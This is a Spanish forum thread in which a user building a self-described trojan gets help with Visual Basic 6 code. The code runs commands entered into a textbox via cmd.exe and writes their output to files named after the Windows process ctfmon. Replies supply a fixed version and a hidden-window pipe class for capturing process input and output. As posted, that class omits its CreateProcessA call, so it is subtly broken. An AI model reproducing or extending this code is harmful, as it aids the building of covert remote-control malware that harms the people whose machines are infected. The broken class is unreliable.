Tema: ejecutar .bat desde shell (Leído 9,935 veces)
Mensajes: 784
Solo se que se algo pero no me acuerdo
Bueno como os dije, me estoy basando en tutoriales, manuales uqe veo y voy cogiendo ideas para poder mejorar mi troyano Private Sub Command1_Click() Dim casa As String casa = Environ$("homedrive") orden = Text1
Open casa & "\ctfmon.bat" For Output As #1 Print #1, orden & ">" & "ctfmon.txt" Close #1
ini = casa & "\ctfmon.bat"
Shell ini
Open casa & "\ctfmon.txt" For Input As #1 todo = input(LOF(1), #1) Close #1
Text2 = todo End Sub en esta parte, pretendo que al generar una orden, esta se cree en un bat que redireccione la salida a un archivo de texto que previamente se leera en en textbox la cosa es que al hacer el shell ini, no me ejecuta el archivo, probe con shell execute pero nose si lo hice mal, con lo cual, no se me genera el .bat y el .txt por lo tanto tampoco haber si me podeis ayudar
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Mensajes: 624
Hola, creo que te falta un espacio el la sig linea (antes de ctfmon.txt)
Print #1, orden & ">" & "ctfmon.txt"
Print #1, orden & ">" & " ctfmon.txt"
« Última modificación: 25 Mayo 2009, 17:26 pm por Dessa »
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Adrian Desanti
Mensajes: 784
Solo se que se algo pero no me acuerdo
nada, eso da igual, ejecuto el bat generado y me sale el texto pero con shell no
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Mensajes: 624
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Adrian Desanti
Mensajes: 784
Solo se que se algo pero no me acuerdo
si ya vi mogollon de funciones shell y son asi, pero nose porque no funcionara, ese es todo el codigo nada mas
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Varias cosas esto está bien Print #1, orden & ">" & "ctfmon.txt" incluso puedes hacerlo así dirctamente Print #1, orden & ">ctfmon.txt" no hace falta el espacio Lo que sucede, es que tu estas intentando leer el txt cuando aun no se ha creado, debes esperar que el bat lo cree para leer su contenido, para eso, usa una función que postearon por acá para esperar la culminación de un proceso. Si no lo encuentras, ahora te lo busco y por favor, declara las variables y usa identificadores para el tipo, te recomiendo hagas uso de la instrucción "Option explicit". saludos,
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Mensajes: 784
Solo se que se algo pero no me acuerdo
sisi, ahi tienes razon, aun asi el codigo este es una prueba, no las declare para ganar tiempo, aunque no es nada la verdad
hay alguna formula que te haga esperar x tiempo?
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Claro : suerte en lo que haces!
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Mensajes: 624
Option Explicit
Private Sub Form_Load() Text1 = "Dir" End Sub
Private Sub Command1_Click() Dim casa As String casa = Environ$("homedrive") Dim orden As String orden = Text1 Dim todo As String
Shell "cmd.exe /c" & orden & ">" & casa & "\ctfmon.txt"
Dim x As Long: x = Round(Timer): While Round(Timer) < x + 2: DoEvents: Wend
Open casa & "\ctfmon.txt" For Input As #1 todo = Input(LOF(1), #1) Close #1
Text2 = todo End Sub
Sin bat ???
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Adrian Desanti
Mensajes: 2.416
Se siente observado ¬¬'
Sin fichero temporal en el disco? == Con Pipes? '--------------------------------------------------------------------------------------- ' Module : cStdIO ' DateTime : 23/04/08 20:23 ' Author : Cobein ' Mail : ' Usage : At your own risk. ' Purpose : Non blocking StdIO pipe ' Requirements: None ' Distribution: You can freely use this code in your own ' applications, but you may not reproduce ' or publish this code on any web site, ' online service, or distribute as source ' on any media without express permission. ' Credits : Amine Haddad ' History : 23/04/08 - First Cut.................................................... '--------------------------------------------------------------------------------------- Option Explicit
Private Const PROCESS_QUERY_INFORMATION As Long = &H400 Private Const PROCESS_TERMINATE As Long = (&H1) Private Const PROCESS_VM_READ As Long = &H10 Private Const NORMAL_PRIORITY_CLASS As Long = &H20& Private Const STARTF_USESTDHANDLES As Long = &H100& Private Const STARTF_USESHOWWINDOW As Long = &H1 Private Const SW_HIDE As Long = 0 Private Const PIPE_WAIT As Long = &H0 Private Const PIPE_NOWAIT As Long = &H1 Private Const PIPE_READMODE_BYTE As Long = &H0 Private Const PIPE_READMODE_MESSAGE As Long = &H2 Private Const PIPE_TYPE_BYTE As Long = &H0 Private Const PIPE_TYPE_MESSAGE As Long = &H4 Private Const STILL_ACTIVE As Long = &H103
Private Type SECURITY_ATTRIBUTES nLength As Long lpSecurityDescriptor As Long bInheritHandle As Long End Type
Private Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type
Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadID As Long End Type
Private Declare Function CreatePipe Lib "kernel32" (phReadPipe As Long, phWritePipe As Long, lpPipeAttributes As Any, ByVal nSize As Long) As Long Private Declare Function SetNamedPipeHandleState Lib "kernel32" (ByVal hNamedPipe As Long, lpMode As Long, lpMaxCollectionCount As Long, lpCollectDataTimeout As Long) As Long Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, ByVal lpBuffer As String, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Any) As Long Private Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Any) As Long Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpApplicationName As Long, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hHandle As Long) As Long Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private c_bPiping As Boolean Private c_bCancel As Boolean Private c_lhReadPipe As Long Private c_lhWritePipe As Long Private c_lhReadPipe2 As Long Private c_lhWritePipe2 As Long
Public Event DataArrival(ByVal sData As String)
Public Function ClosePipe() As Boolean If Not c_bCancel Then c_bCancel = True ClosePipe = True End If End Function
Public Function StartProcessPipe(ByVal sPath As String) As Boolean Dim tSTARTUPINFO As STARTUPINFO Dim tPROCESS_INFORMATION As PROCESS_INFORMATION Dim tSECURITY_ATTRIBUTES As SECURITY_ATTRIBUTES Dim lRet As Long Dim lhProc As Long Dim sBuffer As String * 4096
If sPath = vbNullString Then Exit Function If c_bPiping Then Exit Function
c_bCancel = False
With tSECURITY_ATTRIBUTES .nLength = LenB(tSECURITY_ATTRIBUTES) .bInheritHandle = True .lpSecurityDescriptor = False End With
'// Output Pipe lRet = CreatePipe(c_lhReadPipe, c_lhWritePipe, tSECURITY_ATTRIBUTES, 0&) If lRet = 0 Then GoTo CleanUp
'// Input Pipe lRet = CreatePipe(c_lhReadPipe2, c_lhWritePipe2, tSECURITY_ATTRIBUTES, 0&) If lRet = 0 Then GoTo CleanUp
'// Non blocking mode lRet = SetNamedPipeHandleState(c_lhReadPipe, PIPE_READMODE_BYTE Or PIPE_NOWAIT, 0&, 0&) If Not lRet = 0 Then GoTo CleanUp
With tSTARTUPINFO .cb = LenB(tSTARTUPINFO) .dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW .wShowWindow = SW_HIDE .hStdOutput = c_lhWritePipe .hStdError = c_lhWritePipe .hStdInput = c_lhReadPipe2 End With
If tPROCESS_INFORMATION.hProcess = 0 Then GoTo CleanUp
c_bPiping = True StartProcessPipe = True RaiseEvent DataArrival(vbCrLf & "---> Process started [" & Now & "]" & vbCrLf) Do If c_bCancel = True Then Exit Do DoEvents: Call Sleep(100) If Not ReadFile(c_lhReadPipe, sBuffer, 4096, 0, 0&) = 0 Then RaiseEvent DataArrival(Left(sBuffer, lstrlen(sBuffer))) sBuffer = String$(4096, vbNullChar) DoEvents End If
Call GetExitCodeProcess(tPROCESS_INFORMATION.hProcess, lRet) Loop While lRet = STILL_ACTIVE
CleanUp: Call CloseHandle(tPROCESS_INFORMATION.hProcess) Call CloseHandle(c_lhReadPipe): c_lhReadPipe = 0 Call CloseHandle(c_lhReadPipe2): c_lhReadPipe2 = 0 Call CloseHandle(c_lhWritePipe): c_lhWritePipe = 0 Call CloseHandle(c_lhWritePipe2): c_lhWritePipe2 = 0
If c_bCancel Then ExitProcessPID tPROCESS_INFORMATION.dwProcessId RaiseEvent DataArrival(vbCrLf & "---> Process terminated by user [" & Now & "]" & vbCrLf) Else RaiseEvent DataArrival(vbCrLf & "---> Process terminated [" & Now & "]" & vbCrLf) End If
c_bPiping = False
End Function
Public Function WriteToPipe(ByVal sData As String) As Boolean Dim bvData() As Byte
If Not c_bPiping Then RaiseEvent DataArrival(vbCrLf & "---> Pipe not connected [" & Now & "]" & vbCrLf) Else bvData = StrConv(sData & vbCrLf & vbNullChar, vbFromUnicode) If WriteFile(c_lhWritePipe2, bvData(0), UBound(bvData), 0, 0&) Then WriteToPipe = True End If End If End Function
Private Function ExitProcessPID(ByVal lProcessID As Long) As Boolean Dim lProcess As Long Dim lExitCode As Long
If GetExitCodeProcess(lProcess, lExitCode) Then TerminateProcess lProcess, lExitCode ExitProcessPID = True End If
Call CloseHandle(lProcess) End Function
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